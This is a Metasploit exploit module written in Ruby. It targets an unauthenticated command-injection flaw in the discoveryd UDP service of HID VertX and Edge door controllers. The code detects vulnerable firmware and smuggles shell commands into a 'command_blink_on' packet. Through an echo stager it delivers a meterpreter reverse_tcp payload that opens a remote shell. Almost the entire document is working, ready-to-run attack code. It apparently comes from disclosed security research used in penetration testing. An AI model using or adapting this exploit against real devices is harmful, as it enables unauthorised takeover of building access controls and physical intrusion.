This Metasploit module exploits an unauthenticated remote command execution vulnerability in the discoveryd service exposed by HID VertX and Edge door controllers. This Metasploit module was tested successfully on a HID Edge model EH400 with firmware version 2.3.1.603 (Build 04/23/2012).
e118b7fe52dd732ff59de4e2ac893248##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'HID discoveryd command_blink_on Unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated remote command execution
vulnerability in the discoveryd service exposed by HID VertX and Edge
door controllers.
This module was tested successfully on a HID Edge model EH400
with firmware version 2.3.1.603 (Build 04/23/2012).
},
'Author' =>
[
'Ricky "HeadlessZeke" Lawshae', # Discovery
'coldfusion39', # VertXploit
'Brendan Coles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true,
'References' =>
[
['ZDI', '16-223'],
['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'],
['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'],
['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'],
['URL', 'https://github.com/lixmk/Concierge'],
['URL', 'https://github.com/coldfusion39/VertXploit']
],
'DisclosureDate' => 'Mar 28 2016',
'DefaultOptions' =>
{
'WfsDelay' => 30,
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => 'echo'
},
'Targets' => [['Automatic', {}]],
'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long
'DefaultTarget' => 0))
register_options [ Opt::RPORT(4070) ]
end
def check
connect_udp
udp_sock.put 'discover;013;'
res = udp_sock.get(5)
disconnect_udp
if res.to_s.eql? ''
vprint_error 'Connection failed'
return CheckCode::Unknown
end
hid_res = parse_discovered_response res
if hid_res[:mac].eql? ''
vprint_error 'Malformed response'
return CheckCode::Safe
end
@mac = hid_res[:mac]
vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
vprint_line hid_res.to_s
report_service(
host: rhost,
mac: hid_res[:mac],
port: rport,
proto: 'udp',
name: 'hid-discoveryd',
info: hid_res
)
if hid_res[:version].to_s.eql? ''
vprint_error "#{rhost}:#{rport} - Could not determine device version"
return CheckCode::Detected
end
# Vulnerable version mappings from VertXploit
vuln = false
version = Gem::Version.new(hid_res[:version].to_s)
case hid_res[:model]
when 'E400' # EDGEPlus
vuln = true if version <= Gem::Version.new('3.5.1.1483')
when 'EH400' # EDGE EVO
vuln = true if version <= Gem::Version.new('3.5.1.1483')
when 'EHS400' # EDGE EVO Solo
vuln = true if version <= Gem::Version.new('3.5.1.1483')
when 'ES400' # EDGEPlus Solo
vuln = true if version <= Gem::Version.new('3.5.1.1483')
when 'V2-V1000' # VertX EVO
vuln = true if version <= Gem::Version.new('3.5.1.1483')
when 'V2-V2000' # VertX EVO
vuln = true if version <= Gem::Version.new('3.5.1.1483')
when 'V1000' # VertX Legacy
vuln = true if version <= Gem::Version.new('2.2.7.568')
when 'V2000' # VertX Legacy
vuln = true if version <= Gem::Version.new('2.2.7.568')
else
vprint_error "#{rhost}:#{rport} - Device model was not recognized"
return CheckCode::Detected
end
vuln ? CheckCode::Appears : CheckCode::Safe
end
def send_command(cmd)
connect_udp
# double escaping for echo -ne stager
encoded_cmd = cmd.gsub("\\", "\\\\\\")
# packet length (max 44)
len = '044'
# <num> of times to blink LED, if the device has a LED; else
# <num> second to beep (very loudly) if the device does not have a LED
num = -1 # no beep/blink ;)
# construct packet
req = ''
req << 'command_blink_on;'
req << "#{len};"
req << "#{@mac};"
req << "#{num}`#{encoded_cmd}`;"
# send packet
udp_sock.put req
res = udp_sock.get(5)
disconnect_udp
unless res.to_s.start_with? 'ack;'
fail_with Failure::UnexpectedReply, 'Malformed response'
end
end
def execute_command(cmd, opts)
# the protocol uses ';' as a separator,
# so we issue each system command separately.
# we're using the echo command stager which hex encodes the payload,
# so there's no risk of replacing any ';' characters in the payload data.
cmd.split(';').each do |c|
send_command c
end
end
def exploit
print_status "#{rhost}:#{rport} - Connecting to target"
check_code = check
unless check_code == CheckCode::Appears || check_code == CheckCode::Detected
fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable"
end
# linemax is closer to 40,
# however we need to account for additinal double escaping
execute_cmdstager linemax: 30, :temp => '/tmp'
end
def parse_discovered_response(res)
info = {}
return unless res.start_with? 'discovered'
hid_res = res.split(';')
return unless hid_res.size == 9
return unless hid_res[0] == 'discovered'
return unless hid_res[1].to_i == res.length
{
:mac => hid_res[2],
:name => hid_res[3],
:ip => hid_res[4],
# ? => hid_res[5], # '1'
:model => hid_res[6],
:version => hid_res[7],
:version_date => hid_res[8]
}
end
end